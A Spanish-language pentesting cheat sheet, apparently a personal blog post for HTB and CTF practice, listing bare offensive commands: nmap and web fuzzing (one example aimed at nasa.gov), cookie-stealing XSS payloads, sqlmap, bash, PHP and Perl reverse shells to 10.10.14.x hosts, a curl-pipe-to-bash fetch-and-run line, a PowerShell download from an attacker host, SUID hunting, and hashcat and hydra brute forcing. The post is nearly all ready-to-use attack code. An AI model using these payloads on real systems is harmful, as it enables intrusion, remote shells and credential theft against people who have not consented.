Acerca de este post
He creado este post con la intención de tener apuntes para realización de pentesting, consejos y tips para llevar a cabo penetración de sistemas. Está enfocado a la realización de máquinas en plataformas como HTB, CTFs, así como entornos controlados. Está sujeto a cambios, mejoras, etc dependiendo del uso que vaya probando y mis propias preferencias. No añado comentarios para mantenerlo lo más limpio posible.
Nmap
Escanear sistema
1
| nmap -p- -Pn -sSVC 10.129.229.146
|
Listar scripts
1
| ls /usr/share/nmap/scripts/
|
Usar script
1
| nmap --script ftp-vsftpd-backdoor.nse -p 21 10.129.229.146
|
Exploits
Descubrimientos web
Curl
Fuzzing subdominios
1
| gobuster dns -d nasa.gov -w wordlist/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --delay 400ms
|
Fuzzing directorios
1
| dirsearch -u http://shocker.htb/
|
Fuzzing archivos
1
| dirsearch -u https://target.com -e php,html,js,txt,zip,sql -r --delay 1
|
1
| feroxbuster -u http://shocker.htb//cgi-bin/ -x sh,pl,py,php
|
Fuzzing path
1
| ffuf -u https://www.example.com/search/?q=FUZZ -w wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt -t 1 -v
|
XSS test
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
1
2
| hello"><script>alert("hello")</script>
img"><img src/onerror=prompt(document.cookie)>
|
HTML Injection
1
| marquee"><marquee>hello</marquee>
|
SQLMap
1
| sqlmap -u "https://target.htb" --random-agent
|
Curl
1
| curl -X POST "http://2million.htb/api/v1/invite/verify" -H "accept: application/json" -d "code=12345678" --cookie
|
Payloads
https://github.com/swisskyrepo/PayloadsAllTheThings
Reverse shell
Generador de varias reverseshell https://www.revshells.com/
Bash
1
2
| #!/bin/bash
sh -i >& /dev/tcp/10.10.14.110/4444 0>&1
|
Netcat
Socat
1
| socat tcp-listen:4444 -
|
1
| socat file:`tty`,raw,echo=0 tcp-listen:4444
|
PHP
1
| <?php system("curl http://10.10.14.70:8000/rev.sh|bash"); ?>
|
1
| <?php system(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.166/4444 0>&1′”); ?>
|
Perl
1
2
3
| export RHOST=10.10.14.110
export RPORT=4448
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
1
| auxiliary/scanner/ssh/ssh_login
|
Tratamiento TTY
Linux
1
| script /dev/null -c bash
|
Python
1
2
| python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
|
Pulsar Ctrl+Z , esto envía la terminal al background,
Volvemos a recuperar la terminal, esto nos permite utilizar Ctrl + C sin que se corte la conexión con la shell. Además tenemos un terminal con capacidades como autocompletado.
Escalada privilegios
Descarga de archivos con PowerShell
1
| Invoke-WebRequest -Uri "https://atackerip/archivo.zip" -OutFile "C:\ruta\destino\archivo.zip"
|
Sudo
Find de archivos con el bit SUID activado
1
| find / -perm -u=s -type f 2>/dev/null
|
Find archivos con permisos de escritura
1
| find /ruta -type f -perm -u=w
|
Linpeas/Winpeas
Linpeas.sh Winpeas.bat
Pspy
https://github.com/DominicBreuker/pspy
Módulo local_exploit_suggester
GTFObins
https://gtfobins.github.io/
Cracking
Hashcat
1
| hashcat -m 3200 hash /usr/share/wordlist/rockyou.txt
|
samdump2
Brute force
THC-Hydra
1
| hydra -l root -P ~/pentest/wordlist/rockyou.txt 10.10.14.21 ssh -t 4
|